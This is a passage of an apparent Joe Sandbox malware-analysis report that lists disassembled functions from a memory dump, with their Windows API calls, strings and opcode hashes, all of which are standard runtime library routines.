Function 00A009F9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00A00793,00000000,00000000,?), ref: 00A00A25

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 546f68dd32f95c4fb426ab356ab167084d8a3496c404a01ff6380f71aeb68b78
Instruction ID: 6e402eb28414fa00813fc9bfa02fd97b98996d2f4ccf7ad8a9420090b49e7f3d
Opcode Fuzzy Hash: 546f68dd32f95c4fb426ab356ab167084d8a3496c404a01ff6380f71aeb68b78
Instruction Fuzzy Hash: 92F0A936B40319ABDB2497659C45FBA7B74EB40794F194424ED46A31C0DA74FE42C6D0

Function 00A004EC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

EnumSystemLocalesW.KERNEL32(00A007CA,00000001,00000000,?,-00000050,?,00A00B6C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00A00536

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: d57024db08581f3e40df33cc46d4c3730da9854a2dc4903b79a15b55ba900b54
Instruction ID: d082f8b45da3299079b2da6b95739246884858703394bb5d472d63b70fb5135c
Opcode Fuzzy Hash: d57024db08581f3e40df33cc46d4c3730da9854a2dc4903b79a15b55ba900b54
Instruction Fuzzy Hash: 58F0C2362003086FDB145F75AC81F7B7B91EF81768F05882CFA454B6D0D671AC02CA50

Function 009F7545 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F0EFC: EnterCriticalSection.KERNEL32(?,?,009F6FFF,?,00A11B68,0000000C), ref: 009F0F0B

EnumSystemLocalesW.KERNEL32(009F7538,00000001,00A11B88,0000000C,009F7967,00000000), ref: 009F757D

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d76a1a45a918a650f4979b48e595e7251778b5ddf210d5303049b4e4a569621f
Instruction ID: a4a1d969abbc5ba978a8750f9b4a9dcea3e286e50fc123f6af8ad544ad22d4b6
Opcode Fuzzy Hash: d76a1a45a918a650f4979b48e595e7251778b5ddf210d5303049b4e4a569621f
Instruction Fuzzy Hash: E7F04976A44218EFD700DF98E842BAE77F0FB84721F10812AF9119B2A1DBB55941CF91

Function 00A00406 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009F6CC0: GetLastError.KERNEL32(?,00000008,009F72BF,?,?,009E3AA8,00A5F80C,?,?,009E2949,?,?,?,?,?,009E143A), ref: 009F6CC4
Part of subcall function 009F6CC0: SetLastError.KERNEL32(00000000), ref: 009F6D66

EnumSystemLocalesW.KERNEL32(00A0035F,00000001,00000000,?,?,00A00BCA,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00A0043D

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b72b9b20b36f37c8fe0b817ce1f9c8a9e7c05e4a8c4854048ce33e1bc7edf022
Instruction ID: 082ed8504ded99e19a423e7a5f28a4c8449efc85acc8db46a9223288e67ba9dc
Opcode Fuzzy Hash: b72b9b20b36f37c8fe0b817ce1f9c8a9e7c05e4a8c4854048ce33e1bc7edf022
Instruction Fuzzy Hash: 0FF0E53674024D57CB04AF75E845B6A7F95EFC1710F0A4468EB098B291C6729843C7A0

Function 009F7A6B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,009F5E7F,?,20001004,00000000,00000002,?,?,009F5481), ref: 009F7A9F

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 41481404f7be659633e71d74d0aee0236802da88efd1a652be631c1c328386cd
Instruction ID: 7964efbef0acd877109b53595071d51ec6e279be9eb1b3af10040ac1325a14e5
Opcode Fuzzy Hash: 41481404f7be659633e71d74d0aee0236802da88efd1a652be631c1c328386cd
Instruction Fuzzy Hash: 5AE04F3154821CBBCF136FA0DC09EBEBF29EF44761F014111FE0565260DB759922ABD5

Function 009EA6B6 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A6C2,009E9B5A), ref: 009EA6BB

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0a565e96976168b29069dfc27d1e6a54299aab49be11bec9c3269a106cc931d5
Instruction ID: 9134e04683d270d3a30bc1c6547d57d18420eb777407adbb58e084322ec91727
Opcode Fuzzy Hash: 0a565e96976168b29069dfc27d1e6a54299aab49be11bec9c3269a106cc931d5
Instruction Fuzzy Hash:

Function 00A00D2A Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00A00D2A

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 5484291e0e64cd115fd2aae79d00d5b5ecf8653edc0f684d736f88c08fa4062d
Instruction ID: f41bf05f02fc615737de1e7f66240226b84da1ea49355899a0b1247fb2137215
Opcode Fuzzy Hash: 5484291e0e64cd115fd2aae79d00d5b5ecf8653edc0f684d736f88c08fa4062d
Instruction Fuzzy Hash: B7A01130A082008B8300CFB2AA08A0F3AE8AA003C030082A8A808C22B0EA308082AF00

Function 009E9A08 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 009E9A0E
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 009E9A1C
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 009E9A2D
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 009E9A3E

Strings

GetSystemTimePreciseAsFileTime, xrefs: 009E9A22
kernel32.dll, xrefs: 009E9A09
GetTempPath2W, xrefs: 009E9A33
GetCurrentPackageId, xrefs: 009E9A16

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 4d0c220dd75466e9aa8e3f901ea21a18303f8a5b93967ec0c5c0b935eaa12dd0
Instruction ID: 83268a88acf1e4ed8ed72d0941f6a359ffe60d472ed40a9e4333a9cb71e1180e
Opcode Fuzzy Hash: 4d0c220dd75466e9aa8e3f901ea21a18303f8a5b93967ec0c5c0b935eaa12dd0
Instruction Fuzzy Hash: 6CE0B672D4631CAFC350DFF4BC0D88A3AA4BA197267024922F445D21A0DA7915478BDC

Function 009ED3B8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 009ED4D7
___TypeMatch.LIBVCRUNTIME ref: 009ED5E5
_UnwindNestedFrames.LIBCMT ref: 009ED737
CallUnexpected.LIBVCRUNTIME ref: 009ED752

Strings

csm, xrefs: 009ED3F5
csm, xrefs: 009ED50E
csm, xrefs: 009ED462

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 7c370f602acf682cb75104adb82940d40b0ebc674a15a86f4e8683dbed181440
Instruction ID: 017221d21ad1ce1edad1a183315611827b5922f8cf986b499a3ad7f99a313c29
Opcode Fuzzy Hash: 7c370f602acf682cb75104adb82940d40b0ebc674a15a86f4e8683dbed181440
Instruction Fuzzy Hash: 4CB19D71802289EFCF16DF96C881AAEB7B9BF54310F14446AE8146B252D731EE51CF91

Function 009FBE1B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 009FC094

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 0b0e52aff17ade39dffa176f0a3b2b238655f776e0cf380a41358209e1fd1c5d
Instruction ID: 9a86346dc549b6e2ee42a63b59659cde6ab476a46a562bebb30629b24e42c5b1
Opcode Fuzzy Hash: 0b0e52aff17ade39dffa176f0a3b2b238655f776e0cf380a41358209e1fd1c5d
Instruction Fuzzy Hash: 4AB106B0A0424DDFDF15DF98C980BBEBBB5AF89310F188155E6059B292CB749D42CF60

Function 00A047DA Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00F8FF28,00F8FF28,?,7FFFFFFF,?,00A04AAA,00F8FF28,00F8FF28,?,00F8FF28,?,?,?,?,00F8FF28,?), ref: 00A04880
__alloca_probe_16.LIBCMT ref: 00A0493B
__alloca_probe_16.LIBCMT ref: 00A049CA
__freea.LIBCMT ref: 00A04A15
__freea.LIBCMT ref: 00A04A1B
__freea.LIBCMT ref: 00A04A51
__freea.LIBCMT ref: 00A04A57
__freea.LIBCMT ref: 00A04A67

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 59494957d3f3c6edd2514daaf6ad27c5f1c5fa70f6a0d5ecd41acf5a6d8c0fe5
Instruction ID: c3fd795e0537102576a68665581d73f9ed07f181c0083b8a8448e4d9ad07ca05
Opcode Fuzzy Hash: 59494957d3f3c6edd2514daaf6ad27c5f1c5fa70f6a0d5ecd41acf5a6d8c0fe5
Instruction Fuzzy Hash: 357112B2A0024DABEF219F94AC81BBF77BABF8D350F254459EB04A72C1E6358D048754

Function 009E96A1 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 009E96EA
__alloca_probe_16.LIBCMT ref: 009E9716
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 009E9755
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E9772
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009E97B1
__alloca_probe_16.LIBCMT ref: 009E97CE
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009E9810
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 009E9833

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 2a69d9064392db3403670587f3eac5cb5de303fa555e533d88b93bd5bc79ab8c
Instruction ID: 6d23ca3470406472021a707114e87ba8588d4b63967c06182388827d0f50df54
Opcode Fuzzy Hash: 2a69d9064392db3403670587f3eac5cb5de303fa555e533d88b93bd5bc79ab8c
Instruction Fuzzy Hash: 6351DE7291028AABEF229FA2CC41FAE3BBDEF45740F154429F914EA1A0D735DD45CB90

Function 009E8510 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009E8517
std::_Lockit::_Lockit.LIBCPMT ref: 009E8521
int.LIBCPMT ref: 009E8538

Part of subcall function 009E2D36: std::_Lockit::_Lockit.LIBCPMT ref: 009E2D47
Part of subcall function 009E2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 009E2D61

codecvt.LIBCPMT ref: 009E855B
std::_Facet_Register.LIBCPMT ref: 009E8572
std::_Lockit::~_Lockit.LIBCPMT ref: 009E8592

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: bfad9575575e07b5a2b3291087c26f83d11359ed574799a12180e76d0338bf9a
Instruction ID: 1fe5ded4efd713eed878e2c2de50d662744dab263ddd792debbc7105688bbd90
Opcode Fuzzy Hash: bfad9575575e07b5a2b3291087c26f83d11359ed574799a12180e76d0338bf9a
Instruction Fuzzy Hash: D61126719006589FCB02EBA5D9457BE77B8BF84321F240959F805A72D1DFB4EE018B81

Function 009ED04A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,009ED041,009EB610,009E5FD3,E6A741B3,?,?,?,?,00A06426,000000FF), ref: 009ED058
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009ED066
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009ED07F
SetLastError.KERNEL32(00000000,?,009ED041,009EB610,009E5FD3,E6A741B3,?,?,?,?,00A06426,000000FF), ref: 009ED0D1

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 72cc30ceaa82214798df332874152b8afad84f891c66f6aef0a5d22ae57cf39c
Instruction ID: ca9b28d457b06c1db60fcf4013084209927167f673dde2e93eb1ba76de37a35f
Opcode Fuzzy Hash: 72cc30ceaa82214798df332874152b8afad84f891c66f6aef0a5d22ae57cf39c
Instruction Fuzzy Hash: F3014C3210E3919EA7376BF6BC8671E365CFB61373B24032AFA20451E1EF625C435544

Function 009E721B Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 009E7222
std::_Lockit::_Lockit.LIBCPMT ref: 009E722C
int.LIBCPMT ref: 009E7243

Part of subcall function 009E2D36: std::_Lockit::_Lockit.LIBCPMT ref: 009E2D47
Part of subcall function 009E2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 009E2D61

codecvt.LIBCPMT ref: 009E7266
std::_Facet_Register.LIBCPMT ref: 009E727D
std::_Lockit::~_Lockit.LIBCPMT ref: 009E729D

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 17b269421529e0dcf45a3a26acc5271dab2d48aca1c8bdfd1b38132e9634d31a
Instruction ID: 23969b0a7c35a5b2d4fd1c5e2475c12c24e438e3e38c2b4ea0972351bb19eca8
Opcode Fuzzy Hash: 17b269421529e0dcf45a3a26acc5271dab2d48aca1c8bdfd1b38132e9634d31a
Instruction Fuzzy Hash: 9A01AD319042998FCB06EBA1C8557BEB775BFC4311F250508F511AB291DF749E02CB82

Function 009F49FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E6A741B3,00000000,?,00000000,00A0664D,000000FF,?,009F498C,?,?,009F4960,?), ref: 009F4A31
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009F4A43
FreeLibrary.KERNEL32(00000000,?,00000000,00A0664D,000000FF,?,009F498C,?,?,009F4960,?), ref: 009F4A65

Strings

mscoree.dll, xrefs: 009F4A2A
CorExitProcess, xrefs: 009F4A3B

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c63e3693cdcdb839713eb3660535b2eaf01acfe4915dda9192193d426e394ae7
Instruction ID: 7a26038366c0fe45b10acdcee0284af60c1ea6aa872fadf8556c63b750279793
Opcode Fuzzy Hash: c63e3693cdcdb839713eb3660535b2eaf01acfe4915dda9192193d426e394ae7
Instruction Fuzzy Hash: F201A23294461DBBCB11DF90DC09FAFBBB8FB04B15F004A25F821A22D0DB759901CB94

Function 009F9E22 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 009F9EA9
__alloca_probe_16.LIBCMT ref: 009F9F6A
__freea.LIBCMT ref: 009F9FD1

Part of subcall function 009F7F9F: HeapAlloc.KERNEL32(00000000,009E563B,?,?,009EAFEA,?,?,?,00000000,?,009E2709,009E563B,?,?,?,?), ref: 009F7FD1

__freea.LIBCMT ref: 009F9FE6
__freea.LIBCMT ref: 009F9FF6

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 4337049eaa4999dd430a513f214e246bb0c855d5a4e65704a66f02fac891c290
Instruction ID: b89a2fe0e4d8df6d6b665f9c8608ecd6feab6ef75c0fc1d85294283f30975bf0
Opcode Fuzzy Hash: 4337049eaa4999dd430a513f214e246bb0c855d5a4e65704a66f02fac891c290
Instruction Fuzzy Hash: B451BF7261020EAFEF219FA5CC81FBB7AADEF85754B150529FE08DA151EB75CC1087A0

Function 009E61BC Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009E61D0
AcquireSRWLockExclusive.KERNEL32(?,?,009E4F01,?,?,009E3E10), ref: 009E61EF
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,009E4F01,?,?,009E3E10), ref: 009E621D
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,009E4F01,?,?,009E3E10), ref: 009E6278
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,009E4F01,?,?,009E3E10), ref: 009E628F

Memory Dump Source

Source File: 00000005.00000002.2108169709.00000000009E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000005.00000002.2108143266.00000000009E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108246204.0000000000A07000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108280020.0000000000A13000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2108377457.0000000000A61000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9e0000_gold.jbxd

Yara matches

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
